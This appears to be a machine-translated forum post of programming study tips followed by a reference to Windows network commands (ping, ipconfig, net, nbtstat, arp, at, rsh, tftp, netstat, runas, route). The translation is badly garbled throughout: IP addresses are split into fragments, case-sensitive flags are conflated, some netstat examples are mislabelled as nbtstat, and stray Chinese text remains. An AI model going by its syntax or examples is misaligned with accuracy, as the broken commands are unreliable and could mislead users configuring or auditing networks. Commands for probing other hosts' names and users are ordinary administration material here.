6 then look around: practice!.
----. .
"Spending grew to charming eyes" is the current status of programming tools. VB, VC, VFP, C ++ Builder, Dehil, MS-C c++, SQL, and so on, is too much. In fact, a programmer, capable of mastering a foreign language, is a basic requirement. Be able to use multiple languages, is a popular trend. My personal situation is: a basic grasp of VC editing environment for all types of programming, VFP, VB, C ++ Builder and other language code I can read, critical moment I can use them to develop my software. . A qualified programmer, should be on the software developed by a co-ordinate the planning and organization, so the quality is learned only under the premise of languages can be achieved. .
The above study, in the final analysis, is just a theoretical knowledge, but only if the person to write a wide range of programs, knowledge truly forming mesh to achieve integration and the East. Computer learning is understanding, and only this level of understanding is the only way to truly understand the computer software.
--------------------------. .
7 back: see teaching materials.
----. .
This time, let's look at materials, found in the original materials or have something to be learned. However, this awareness, it is equipped with a number of materials, the knowledge before sadly found. The world should be not be a study of home book knowledge, teaching materials, of course, is no exception! so, I found this really textbook that valuable thing can be said to be "just had already lost". Learning materials can be, there is no other than the knowledge that I can find it? I think not. Because in that case, it is "not flesh, in the midst of the mountain." . .
----------------------------------------------------------------------------------------------------------。.
Tribute to the butterfly! . .
Please support top!.
Most basic, the most commonly used to test the physical network. .
Ping .168.192.. .88-.10, t-t parameter is waiting for user to interrupt the test.
2. . See DNS, IP, Mac, etc.. .
A。.Win98:winipcfg 。.
B. . Win2000 or above: Ipconfig / all. .
.NSLOOKUP C.: DNS as viewing Hebei.
C: \> nslookup. .
Default Server: ns。.hesjptt。.net。.cn 。.
Address: 202. .99. .160. .68. .
> Server .99.202. .2 .41. changed the DNS 41. .2.
> Pop. . Pcpop. . Com. .
Server: ns。.hesjptt。.net。.cn 。.
Address: 202. .99. .160. .68. .
Non-authoritative answer: 。.
Name: pop. . Pcpop. . Com. .
Address: 202。.99。.160。.212 。.
3. . Web Messenger. .
Net send computer name/IP | * (broadcasting) to deliver content, careful not to cross-segment.
net stop messenger stop messenger service can also be in the panel - Service changes. .
Net start messenger to start the Messenger service.
4. . Probing each other the other computer name, the host of the group, domain, and the current user name. .
Ping-a IP-t to display only the NetBios name.
nbtstat-a 192. .168. .10. .146 Relatively sound. .
5. .netstat-a display of your computer is currently opening up all ports.
netstat-s-e a more detailed display of your network information, including TCP, UDP, ICMP and IP statistics and so on. .
6. detect arp binding (dynamic and static) list that displays all connected to my computer, display each other's IP and MAC address.
arp-a. .
7. in the proxy server.
Bundled IP and MAC address, LAN address theft IP:. .
ARP -s 192。.168。.10。.59 00-50-ff-6c-08-75 。.
Lifting of IP and MAC address of network card binding:. .
Arp-d network card IP.
8. . Hidden in the network neighborhood on your computer. .
net config server /hidden:yes 。.
net config server / hidden: no was open. .
9. several net command.
A. . Displays the current work group server list net view, with no options when using this command, it will display the current domain or network computer list. .
For example: to view the shared resources on IP, it can be.
C: \> net view 192. .168. .10. .8. .
In 192. .168. .10. .8 the shared resource.
Notes name type resource sharing purposes. .
-------------------------------------- 。.
Web Services Disk. .
The command completed successfully.
B. . See a list of user accounts on the computer net user. .
C.-view Web links net use.
For example: net use z: [url = file: / / 192. .168. .10. .8/movie] File: / / 192. .168. .10. .8/movie [/ Url] to the IP of the movie shared directory mapped to the local Z-disks. .
D.-record link net session.
For example:. .
C:\>net session 。.
Computer user name the types of customers to open free time. .
------------------------------------------------------------------------------- 。.
[Url = file: / / 192. .168. .10. .110 /] File: / / 192. .168. .10. .110 / [/ Url] ROME Windows 2000 2195 0 00:03:12. .
[url=file://192。.168。.10。.51/]file://192。.168。.10。.51/[/url] ROME Windows 2000 2195 0 00:00:39 。.
The command completed successfully. .
10. route tracking.
A. . Tracert pop. . Pcpop. . Com. .
Pop B.. .pcpop .pathping. .com in addition to displaying the routing, but also provide the analysis, calculating 325S lost packets per cent.
11. . On shared security, several commands. .
A.. view your machine's net share the shared resource.
B. . Manually delete the share. .
net share c$ /d 。.
net share d $ / d. .
net share ipc$ /d 。.
net share admin $ / d. .
Note that the spaces are after.
C. . Add a share:. .
c:\net share mymovie=e:\downloads\movie /users:1 。.
mymovie shared success. .
At the same time limit the number of users linking to one person.
12. . In the DOS line under the setting static IP. .
A.. setting a static IP.
CMD. .
netsh 。.
netsh> int. .
interface>ip 。.
interface ip> set add "Local Links" static IP address mask gateway. .
B.-view the IP settings.
interface ip> show address. .
The first page.
Classic command-line network (2). .
--------------------------------------------------------------------------------。.
Arp. .
Display and modify the "address resolution protocol (ARP)" item in the cache. The ARP cache contains one or more tables that are used to store the IP address and parsed Ethernet or token ring physical address. Installed on your computer every Ethernet or token ring network adapter has its own separate table. If used without parameters, the arp command displays the help information.
Syntax. .
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]。.
Parameters. .
-a [InetAddr] [-N IfaceAddr] 。.
Display all interfaces of the current ARP cache table. To display the IP address of the specified ARP cache entries, use the parameters with InetAddr arp-a, here on behalf of the specified IP address InetAddr. To display the ARP cache table the specified interface, use the-N IfaceAddr parameters, here assigned to the designated representative of IfaceAddr interface IP address. -N parameter is case sensitive. .
-g [InetAddr] [-N IfaceAddr] 。.
With-a the same. .
-d InetAddr [IfaceAddr] 。.
Remove the specified IP address entry on behalf of IP addresses InetAddr here. For the specified interface, you want to delete a table, use the IfaceAddr parameters, here IfaceAddr representatives assigned to the interface IP address. To delete all entries, use the asterisk (*) wildcard to replace InetAddr. .
-s InetAddr EtherAddr [IfaceAddr] 。.
Adding to the ARP cache can resolve IP addresses into physical addresses EtherAddr InetAddr static entries. To specify the interface to add a static ARP cache table entries, use the IfaceAddr parameters, here IfaceAddr representatives assigned to the interface IP address. .
/? 。.
Displays help at the command prompt. .
Comments.
InetAddr and IfaceAddr of IP addresses with a dot decimal notation. .
The physical address EtherAddr consists of six bytes of the byte in hexadecimal notation and separated by hyphens (for example, 00-AA-00-4F-2A-9C).
By adding the entry-s parameter is a static item, they are not super when ARP cache. If the termination of TCP / IP protocol and then start, these items will be deleted. To create a permanent static ARP cache entry, in a batch file using the appropriate arp command and through the "Task Scheduler" in the startup to run the batch file. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
To display the ARP cache on all interfaces, type: table.
arp-a. .
For the assigned IP address is 10. .0 .0.. .99 interface, to display the ARP cache table, type:.
arp-a-N 10. .0. .0. .99. .
To add IP addresses to .0 .0.10.. .80 resolves physical address 00-AA-00-4F-2A-9C static ARP cache entries, you can type:.
arp-s 10. .0. .0. .80 00-AA-00-4F-2A-9C. .
At。.
Program at a designated time and date on the computer to run commands and procedures. at the command only "plan" service runtime. If the case in the absence of parameters to use, then at lists scheduled commands. .
Syntax.
at [\ \ ComputerName] [([ID] [/ delete] | / delete [/ yes])]. .
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,。.] |/next:date[,。.]}] command]。.
Parameters. .
[url=file://computername/]file://computername/[/url] 。.
The specified remote computer. If you omit this parameter, then the plan at the local computer commands and procedures. .
ID 。.
Planned orders assigned to the specified identifier. .
/delete 。.
Cancellation of planned orders. If you omit the ID, then the computer commands all plans will be canceled. .
/yes 。.
Delete the program event, from the system all queries answered "yes." .
hours:minutes 。.
Command to run the specified time. The time in 24 hour clock (from 00:00 [midnight] to 23:59) in hours: minutes format. .
/interactive 。.
When running the command for the logged on user, allowing command and the user interact with the desktop. .
/every: 。.
Each week or month in the specified date (for example, every Thursday, or the third day of each month) to run command command. .
date 。.
Run the command specified date. You can specify a certain day or days a week (that is, type M, T, W, Th, F, S, Su) or one month in a day or days (ie, type from a number between 1 and 31) . Separate multiple date entries with a comma. If you omit the date, then at the current day of the month to use. .
/next: 。.
The next specified date (for example, next Thursday) comes running command. .
command 。.
Designated to run the Windows command, program (.. Exe or.. Com file) or batch program (.. Bat or.. Cmd files). When the command requires a path as an argument, use the absolute path, that is, starting from the drive the entire route. If the command on the remote computer, specify the server and share name of universal naming conventions (UNC) notation, rather than a remote drive letter. .
/? 。.
Displays help at the command prompt. .
Comments.
Schtasks is more powerful superset of the command line program tool at the command line tool with all the features. Command-line program for all tasks, can be used to replace schtasks at. For more information about schtasks, see the "Related Topics." .
Use at. ..
Use the at command, require that you must be a member of the local Administrators group. .
Loads the .exe. Cmd.
Before running the command, At does not automatically load Cmd. . Exe (command interpreter). If you do not run the executable file (.. Exe), then in command at the beginning of the method must be used as follows special load Cmd. . Exe:. .
cmd /c dir > c:\test。.out。.
View the program command. .
When not used with command line options, at the scheduled task will appear in a format similar to the following: in the table.
Status ID Day Time Command Line. .
OK 1 Each F 4:30 PM net send group leads status due。.
OK 2 Each M 12:00 AM chkstor> check. . File. .
OK 3 Each F 11:59 PM backup2。.bat 。.
Include identification number (ID). .
When used in a command prompt with the identification number (ID) at command, a single task information is displayed in a format similar to the following:.
Task ID: 1. .
Status:OK。.
Schedule: Each F. .
Time of Day:4:30 PM。.
Command: net send group leads status due when the plan with the at command (especially with a command-line options of the command), the non-through type at the command line option to check the command syntax is typed correctly. If the display in the "Command Line" column in the information is incorrect, please delete the command, and then re-type it. If not correct, you can re-type the command make it less with some command line options. .
View the results.
Planned to use at the command runs as a background process. The results will not be shown running on the computer. To redirect the output to a file, use the redirection symbol (>). If you redirect output to a file, whether in the command line or batch file to use at, all need to use the escape character before the redirection symbol (^). For example, to redirect the output to the Output. . Text file, you would type:. .
at 14:45 c:\test。.bat ^>c:\output。.txt。.
Implementation of the orders for the systemroot folder on the current directory. .
Change the system time.
Zai 使用 at the command planned to run the command after, if you change the computer's system time, then by typing the command line option without the at Keshi at Jihua procedures also modify the system time Tongbu. .
Storage command.
Planned orders are stored in the registry. Thus, if the re-launch "plan" service, scheduled tasks will not be lost. .
Connect to a network drive.
Programs that need access to the network operations, please do not use the re-orientation of the drive. "Plan" service may not be able to access these redirected drive, or, in the task of running the program if other users log on, these redirected drive might not appear. Therefore, plan work, use the UNC path. For example:. .
at 1:00pm my_backup [url=file://server/share]file://server/share[/url] 。.
Please do not use the following syntax (where x:? Expressed by the user to establish a connection):. .
at 1:00pm my_backup x: 。.
If you plan a drive letter to use the at command to connect to the shared directory, should contain an at command to enable the completion of the drive and disconnect the drive when using the connection. If you can not disconnect the connection with the drive, then at the command prompt, the assigned drive letter will not be available. .
Paradigm.
Marketing on the server to display a list of commands scheduled, type:. .
at [url=file://marketing/]file://marketing/[/url] 。.
To find the server Corp identification number on the order of 3 For more information, type:. .
at [url=file://corp/]file://corp/[/url] 3 。.
8:00 in the morning to plan to run on a network share Corp server command, and redirect to the Maintenance of the list server Corp. . Txt file (located in the Reports shared directory), type:. .
at [url=file://corp/]file://corp/[/url] 08:00 cmd /c "net share reports=d:\marketing\reports >> [url=file://maintenance/reports/corp。.txt]file://maintenance/reports/corp。.txt[/url]" 。.
In order to post every five days to midnight Marketing backup server's hard drive to the tape drive, first create a named Archive. . Cmd batch program (it has a backup command), and then plans to run the batch process, this type:. .
at [url=file://marketing/]file://marketing/[/url] 00:00 /every:5,10,15,20,25,30 archive 。.
To cancel the current server has been planned for all orders, please remove the following methods at program information:. .
at /delete 。.
If you want to run the command is not an executable (.. Exe) file, as shown by the following methods used before the command cmd / c to load Cmd. . Exe:. .
cmd /c dir > c:\test。.out。.
Rsh. .
Running the RSH service to run commands on a remote computer. Windows XP and Windows 2000 does not provide an RSH service. Windows 2000 Server Resource Kit provides the name of the .exe to Rshsvc. RSH service. Used without parameters, the rsh displays help.
Syntax. .
rsh [Host] [-l UserName] [-n] [Command]。.
Parameters. .
Host 。.
Run command specifies the remote computer. .
-l UserName 。.
Specify a remote computer using the user name. In the omitted case, using the current logged-on user name. .
-n 。.
Will be redirected to the NULL rsh input device. This prevents the local computer command results display. .
Command 。.
Designated to run the command. .
/? 。.
Displays help at the command prompt. .
Comments.
Standard operation. .
Rsh command on standard input to the remote command, standard output of the remote command to its standard output, and standard error of the remote command to its standard error replication. Rsh normally terminates when the remote command to terminate.
Use the redirection symbol. .
In order to enable the redirection to occur on the remote computer, to quotation redirection symbols (for example "> >"). If you do not use quotation marks, redirection occurs on the local computer. For example, the following command to set the remote file RemoteFile "attached" to the local file "LocalFile":.
rsh othercomputer cat remotefile>> localfile. .
The following command to set the remote file Remotefile to the remote file otherremotefile:.
rsh othercomputer cat remotefile ">>" otherremotefile. .
Using rsh.
Use has logged on to a domain and a computer running Windows XP Professional, the domain of the primary domain controller must be used to confirm the user name or rsh command fails. .
Rhosts file.
rhosts file typically permits network access to UNIX systems. . Rhosts file lists computer can access the remote computer name and the associated login. Configured in the right. . Rhosts file on the remote computer to run rcp, rexec, or rsh command, you do not provide remote computer's login and password information. .
Rhosts file is a text file, that file with one entry for each behavior. Entries from the local computer name, local name, and the entry of all comments. Each entry is separated by a tab or space, and comments begin with a symbol (#). For example:.
host7 # This computer is in room 31A. .
Rhosts file must be on the remote computer of the user's home directory. The remote computer's specific implementation of the .rhosts file, see the remote system's documentation.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
Name admin1 should run on the remote computer vax1 telcon command, type:. .
rsh vax1 -l admin1 telcon+。.
Tftp. .
To run the trivial file transfer protocol (TFTP) service or daemon remote computers (especially computers running UNIX) to transfer files to or from running Trivial File Transfer Protocol (TFTP) service or daemon remote computers (especially computers running UNIX) to transfer files.
Syntax. .
tftp [-i] [Host] [{get | put}] [Source] [Destination]。.
Parameters. .
-i 。.
Specifies binary image transfer mode (also known as octal mode). In binary image mode, the file in bytes for a transfer. When sending binary file using the model. If you omit the-i, ASCII mode will send files. This is the default transfer mode. The model will be the end of line (EOL) characters into the appropriate format for the specified computer. Send a text file using the model. If the file is sent successfully, the display data transfer rate. .
Host 。.
Specify local or remote computer. .
put 。.
Destination on the local computer file transfer to a remote computer on the Source file. Because TFTP protocol does not support user authentication, the user must log on to the remote computer, while the remote computer files must be writable. .
get 。.
Destination remote computer file transfer to the local computer Source file. .
Source 。.
Specify the file transfer. .
Destination 。.
Specify the location of the files to. If omitted, Destination, will assume the same name with Source. .
/? 。.
Displays help at the command prompt. .
Comments.
Using get parameters. .
If the local file FileTwo on the computer to transfer to the remote computer, specify the file FileOne put. If the remote file FileTwo on the computer to a file on a remote computer, specify get FileOne.
Windows XP or Windows 2000 does not provide the TFTP server for general use. Windows 2000 services provided by the TFTP server only for Windows XP and Windows 2000 client computers to provide remote boot capabilities. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
From the local computer will be .txt files Users. transfer to the remote computer vax1 on Users19. .txt, type:.
tftp vax1 put users. . Txt users19. . Txt. .
Network Classic command line (3).
-------------------------------------------------- ------------------------------。 .
Nbtstat。.
In the local computer and remote computers based on TCP / IP (NetBT) NetBIOS protocol statistics, NetBIOS name tables and NetBIOS name cache. Nbtstat NetBIOS name cache and refresh the Windows Internet Name Service Registration (WINS) name. With no parameters using the nbtstat displays help. .
Syntax.
nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]. .
Parameter.
-A remotename. .
Display the remote computer's NetBIOS name table, where RemoteName is the remote computer's NetBIOS computer name. The NetBIOS name table is run on this computer application uses the NetBIOS name of the list.
-A IPAddress. .
Display the remote computer's NetBIOS name table, and their names from the remote computer's IP address specifying (in decimal separator).
-C. .
Displays the NetBIOS name cache contents, the NetBIOS name table of the individual addresses.
-N. .
Displays the local computer's NetBIOS name table. Registered in the name of the State indicates that it is through the radio, or WINS server registration.
-R. .
Displays the NetBIOS name resolution statistics. That is configured to use WINS Windows XP computer, this parameter will return through broadcasting and WINS name resolution and registration number.
-R. .
Clear the contents of the NetBIOS name cache and reload the Lmhosts file with # PRE marked items.
-RR. .
Recast and refreshing WINS registration of the local computer's NetBIOS name.
-S. .
Displays NetBIOS client and server sessions, and attempt to target IP addresses into names.
-S. .
Displays NetBIOS client and server sessions, only by IP address lists the remote computer.
Interval. .
Redisplays selected statistics, you can break between each Interval is displayed in a specified number of seconds. Press CTRL + c to stop redisplaying statistics. If this argument is omitted, netstat will only display the current configuration information.
/?. .
Displays help at the command prompt.
Note. .
Nbtstat command-line parameters are case-sensitive.
The following table lists the column headings generated by the Nbtstat. Captions. .
Input the number of bytes received.
Output the number of bytes sent. .
In/Out the connection from the computer (outbound) or from other computers on your local computer (inbound).
Lift name table cache entry is cleared before the retention time. .
Local Name the local NetBIOS name and the connection is associated.
Remote Host with the remote computer name or IP address associated. .
<03> 转化为十六进制的 NetBIOS 名称的最后一个字节。每个 NetBIOS 名称长度均为 16 个字符。由于最后一个字节通常有特殊的意义,因为相同的名称(只有最后一个字节不同)可能在一台计算机上出现几次。例如,<20> 在 ASCII 文本中是一个空格。
Type the name of the type. The name can be an individual or group name.
Status on the remote computer is running NetBIOS services (the "Registration"), or the same computer name is registered the same service (the "conflict"). .
State NetBIOS connection status.
The following table lists the possible state of NetBIOS connections. State description. .
Connected session has been established.
Associated with the connection end point has been created and associated with the IP address. .
Just answer the endpoints on the inner connection is available.
The free end point has been opened can not receive a single connection. .
Connecting to the session is in the connecting phase. In this phase of the parsing of selected target consists of a name to IP address mapping.
To accept inbound session is currently being accepted and will soon connection. .
Reconnecting session will attempt to reconnect (if the first connection failed).
The station is in the connection phase of the session. This stage is to create TCP connections. .
Inbound connections inbound sessions in the session.
Is disconnected session is disconnected. .
Interrupted connection to the local computer has been disconnected and is awaiting confirmation from the remote system.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display the NetBIOS computer name CORP07 NetBIOS name of the remote computer table, type:. .
nbtstat -a CORP07。.
To display the IP address assigned to 10. .0. .0. .99 Of a remote computer NetBIOS name table, type:. .
nbtstat -A 10。.0。.0。.99。.
To display the local computer's NetBIOS name table, type:. .
nbtstat -n。.
To display the local computer NetBIOS name cache contents, type:. .
nbtstat -c。.
To clear the NetBIOS name cache and reload the file with the local Lmhosts # PRE tag items, type:. .
nbtstat -R。.
To release the WINS server by NetBIOS name registration and its re-registration, please type:. .
nbtstat -RR。.
To IP address every 5 seconds to display NetBIOS session statistics, type:. .
nbtstat -S 5。.
Netstat. .
Displays active TCP connections, ports on the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics (for the IP, ICMP, TCP and UDP protocols), and IPv6 statistics (for the IPv6, ICMPv6, TCP over IPv6, and UDP over IPv6 protocols). When used without parameters, netstat displays active TCP connections.
Syntax. .
netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]。.
Parameters. .
-a 。.
Show all activities of the TCP connection and the computer's TCP and UDP port listener. .
-e 。.
Show Ethernet statistics, such as the number of bytes sent and received, the number of data packets. This parameter can be used in conjunction with the-s. .
-n 。.
TCP connection showed activity, but only in digital form of address and port number, do not try to determine the name. .
-o 。.
TCP connection and display activities, including the process for each connection ID (PID). In Windows Task Manager "processes" tab, find the PID-based applications. This parameter can be with-a,-n and-p combination. .
-p Protocol 。.
Display Protocol agreement specified the connection. In this case, Protocol can be tcp, udp, tcpv6 or udpv6. If this parameter used in conjunction with the-s show statistics by protocol, the Protocol can be tcp, udp, icmp, ip, tcpv6, udpv6, icmpv6 or ipv6. .
-s 。.
Display statistics by protocol. By default, the display TCP, UDP, ICMP and IP protocol statistics. If you installed Windows XP, IPv6, will be displayed on the IPv6 TCP, IPv6, on the UDP, ICMPv6, and IPv6 protocol statistics. Can use the-p parameter to specify the protocol set. .
-r 。.
Display IP routing table of contents. The equivalent parameters and route print command. .
Interval 。.
Every Interval seconds to re-display a selection of information. Press CTRL + C to stop the show statistics. If this parameter is omitted, netstat will print only a selection of information. .
/? 。.
Displays help at the command prompt. .
Comments.
With the order parameter must be used with a hyphen (-) rather than short-slash (/) as a prefix. .
Netstat provides the following statistical information:.
Proto. .
The name of the Protocol (TCP or UDP).
Local Address. .
The local computer's IP address and port number is being used. If you do not specify the-n parameter, it displays the IP address and port name corresponds to the local computer name. If the port has not been established, the port to an asterisk (*) is displayed.
Foreign Address. .
Connect the socket to the remote computer's IP address and port number. If you do not specify the-n parameter, it displays the IP address and port that corresponds to the name. If the port has not been established, the port to an asterisk (*) is displayed.
(State). .
Indicates the State of the TCP connection. Possible States are as follows:.
CLOSE_WAIT. .
CLOSED。.
ESTABLISHED. .
FIN_WAIT_1。.
FIN_WAIT_2. .
LAST_ACK。.
LISTEN. .
SYN_RECEIVED。.
SYN_SEND. .
TIMED_WAIT。.
The TCP connection state information, see RFC 793. .
Only when the Internet Protocol (TCP/IP) Protocol in the network connection is installed as a network adapter property of the component, the command is available.
Example. .
If you want to display the Ethernet statistics and the statistics for all protocols, type the following command:.
netstat-e-s. .
If you want to display only the TCP and UDP protocols, type the following command:.
netstat-s-p tcp udp. .
Every 5 seconds to display active TCP connections and the process ID, type the following command:.
nbtstat-o 5. .
If you want to digitally displays active TCP connections and the process ID, type the following command:.
nbtstat-n-o. .
Runas。.
Allows the user to run with the permissions specified by other tools and procedures, rather than the user currently logged on to provide the permission. .
Syntax.
runas [(/ profile | / noprofile)] [/ env] [/ netonly] [/ smartcard] [/ showtrustlevels] [/ trustlevel] / user: UserAccountName program. .
Parameter.
/ Profile. .
To load a user profile. /Profile is the default value.
/ No profile. .
/Noprofile Specifies not to load a user profile. This allows an application to load more quickly, but some applications can also cause errors.
/ Env. .
Specifies the current network environment, instead of the user's local environment.
/ Netonly. .
Indicates that the specified user information is only used for remote access.
/ Smartcard. .
/Smartcard said credentials are provided by the smart card.
/ Showtrustlevels. .
/Trustlevel switch are listed.
/ Trustlevel. .
Specifies the authorization level. Use/showtrustlevels view available trust level.
/ User: UserAccountName. .
Specifies the program name of the user account. The user account format should be [email = user @ domain] user @ domain [/email] or domain\user.
Program. .
Specifies that you want to use in/user the account specified in the program or command.
/?. .
Displays help at the command prompt.
Note. .
Administrators can use an account with restrictive permissions to perform routine, nonadministrative tasks only when performing specific administrative tasks using a larger account. You want to without logging off and back on login is done so with a regular account, and then use the runas command to run the tools that require the broader permissions..
Use the runas command examples, see the "Related Topics." .
Although the runas Administrator accounts are usually, but not limited to Administrator accounts. Any user with multiple accounts can use alternate credentials, use runas to run a program, MMC console, or the "Control Panel" item.
If you want to use the Administrator account on the computer, the / user:, type one of the following parameters:. .
/user:AdministratorAccountName@ComputerName。.
/ User: ComputerName \ AdministratorAccountName. .
If you want to use a domain administrator to use this command, type one of the following parameters.
/ User: AdministratorAccountName @ DomainName. .
/useromainName\AdministratorAccountName。.
runas command allows you to run the program (*.. exe), saved MMC console (*.. msc), procedures and save the MMC console shortcuts and "Control Panel" item. As another group (such as "Users" or "Power Users" group) members log on to the computer, you can run as an administrator. .
You can use the runas command to start any program, MMC controller or the "Control Panel". As long as you provide the appropriate user account and password information, the user account has the ability to log on to the computer, and the program, MMC console, "" Control Panel "entry in the system and to the user account is available.
runas command allows you to manage other domains of the server (the computer and run the tool to manage the server in a different domain). .
If you try to use runas from the network location to start a program, MMC console, or the "Control Panel", may be used to connect to the network share, the credentials used to start the program are different. The latter credentials may not be able to access the same network share.
Some items, such as "Printers" folder and desktop items, indirectly from Windows 2000 to open, but can not use the runas command. .
If the runas command fails, then it is likely that you do not run the RunAs service or use of the user account is not valid. To check the status of the RunAs service, in the "computer management", click "services and applications", and then click the "services". To test user account, please try to use the appropriate domain account to log in.
Example. .
To as an administrator on the local computer to start Windows 2000 an instance of the command prompt, type:.
runas / user: localmachinename \ administrator cmd. .
When prompted, type the administrator password.
To use the named companydomain \ domainadmin the domain administrator account, start the "Computer Management" snap-in instance, type:. .
runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt。.msc" 。.
When prompted, type the account password. .
To use the named domain. .microsoft .com domain., by the domain administrator account user starts an instance of "Notepad", type:.
runas / user: user @ domain. . Microsoft. . Com "notepad my_file.. Txt". .
When prompted, type the account password.
To start a command prompt window, saved MMC console, Control Panel items or of any other place an instance of the server program, type:. .
runas /netonly /user:domain\username "command" 。.
domain \ username must have sufficient user rights management server. When prompted, type the account password. .
Route。.
In the local IP routing table display and modify the entries. Use the route without parameters to display help. .
Syntax.
route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]. .
Parameter.
-F. .
Clear all is not a primary route (netmask 255. .255. .255. .255 route), the loopback network route (target = 127. .0 .0 .0.., netmask 255. .255. .255. .0 routing) or multicast routing (target = 224. .0 .0 .0.., netmask 240. .0 .0 .0.. routing) entries in the routing table. If it is one of the commands (such as add, change, or delete), the table before running the command to clear.
-P. .
And add the command to use when the specified route is added to the registry and whenever the TCP/IP protocol is started to initialize the IP routing table. By default, when you start a TCP/IP protocol does not save the added route. And when used with the print command, display persistent route list. All other commands are ignored for this parameter. . .
Command 。.
Designated to run the command. The following table lists valid command. Command purposes. .
Add adds a route.
change to change the existing route. .
Delete Deletes a route.
print print routing. .
Destination 。.
Designated route network destination address. Destination address can be an IP network address (network address which the host address bits set to 0), the main route is the IP address for the default route is 0. .0. .0. .0. .
mask subnetmask 。.
Specify the target address associated with the network's subnet mask (also known as the subnet mask). Subnet mask for the IP network address can be an appropriate subnet mask for the host route is 255. .255. .255. .255, For the default route is 0. .0. .0. .0. If omitted, use the subnet mask 255. .255. .255. .255. As the target when the definition of the routing relationship between the address and subnet mask, destination address can not be more than its corresponding subnet mask details. In other words, if a subnet mask is 0, then the destination address of the corresponding bits can not be set to 1. .
Gateway 。.
Specified by the network over the definition of goals and subnet mask address set up to the previous or next hop IP address. For local connections from the subnet, gateway address is assigned to the connection interface IP subnet address. For to go through one or more routers can be used in remote routing, gateway address is assigned to the neighboring router, directly to the IP address. .
metric Metric 。.
Required for the routing metric specified integer value (range is 1 to 9999), which is used in the routing table to select multiple routing and forwarding packets of the destination address matches the best route. The selected route has the least metric. Metric to reflect the number of hops, the speed of the path, path reliability, path throughput, and management of property. .
if Interface 。.
Specify the target can reach the interface index of the interface. Use the route print command to display interface and the corresponding interface index of the list. Interface index can be used for decimal or hexadecimal value. For hexadecimal values, in front of the hexadecimal number with 0x. Ignored if parameters, the interface established by the gateway address. .
/? 。.
Displays help at the command prompt. .
Comments.
Routing table, the value of a metric is due to allow larger TCP / IP LAN interface of each IP address, subnet mask and default gateway configuration automatically determine the routing table, routing metric result. Automatically determine the default boot interface metric to determine the speed of each interface, adjusted the route metric for each interface, so the fastest interface creates the routes with the lowest metric. To remove the large metric, each LAN connection TCP / IP protocol to disable the advanced properties automatically determines the interface metric. .
If in the systemroot\System32\Drivers\Etc folder on the local network file in the appropriate entry, name can be used for Destination. As long as the name of the domain name system by "" (DNS) queries the standard host name resolution techniques into an IP address, it can be used to Gateway, DNS queries stored in the systemroot\System32\Drivers\Etc folder under the local hosts file, and NetBIOS name resolution.
If it is print or delete command, you can ignore the Gateway parameter, use the wildcard character to represent the target and the gateway. Destination of the value can be by the asterisk (*) wildcard specified. If the specified target contains an asterisk (*) or question mark (?), It is seen as a wildcard, only to print or delete the matching target route. Asterisk on behalf of any one sequence of characters, question mark on behalf of any of the characters. For example, 10. .*. .1, 192. .168. .*, 127. .* And * 224 * is the effective use of the asterisk wildcard. .
Using an invalid destination and subnet mask (netmask) to display the "Route: bad gateway address netmask" error message. Target one or more bits set to 1, and in the subnet mask of the corresponding bit is set to 0, this error occurs. Through the binary representation of an object that represents the destination and the subnet mask to check this. The binary representation of the subnet mask that represents the destination network address including the part of a series of objective 1 and indicates the host address portion of a series of 0 in two parts. . .
Only Windows NT 4. Windows 2000, .0, Windows Millennium Edition and Windows XP-route command supports the-p parameter. Windows 95 or Windows 98 of route command does not support this argument.
Only when the Internet Protocol (TCP / IP) protocol is installed in the network connection properties for the network adapter component, the command can be used. .
Paradigm.
To display the full contents of IP routing table, type:. .
route print。.
To display the IP routing table 10. . Started routing, type:. .
route print 10。.*。.
To add a default gateway address 192. .168. .12. .1 The default route, type:. .
route add 0。.0。.0。.0 mask 0。.0。.0。.0 192。.168。.12。.1。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1 Routing, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1 Permanent routing, type:. .
route -p add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1, 7 metric routing, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 metric 7。.
To add a goal of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0, The next hop address is 10. .27. .0. .1, The interface index 0x3 route, type:. .
route add 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.1 if 0x3。.
To delete a target of 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0 Routing, type:. .
route delete 10。.41。.0。.0 mask 255。.255。.0。.0。.
To delete IP routing table 10. . Started all the routing, type:. .
route delete 10。.*。.
To target 10. .41. .0. .0, Subnet mask is 255. .255. .0. .0 Routing of the next hop address 10. .27. .0. .1 Changed to 10. .27. .0. .25, Type:. .
route change 10。.41。.0。.0 mask 255。.255。.0。.0 10。.27。.0。.25。.
How windowsserver change the ip address of cmd ■ ■ ■ -> Windows 2k/2003 Server. .
At the command line to change the ip address.
Windows2000 is now more popular operating system, its function is very powerful, it can even be the same as the Unix command line to do a lot of work. Following a kind of change in the ip address command line method, is introduced to us (in parentheses is the number of notes in bold type is manual entry of):. .
C:\ > ipconfig (first using the ipconfig command to take a look at the change IP address before).
Windows 2000 IP Configuration. .
Ethernet adapter local area connection:.
Connection-specific DNS Suffix. .:. .
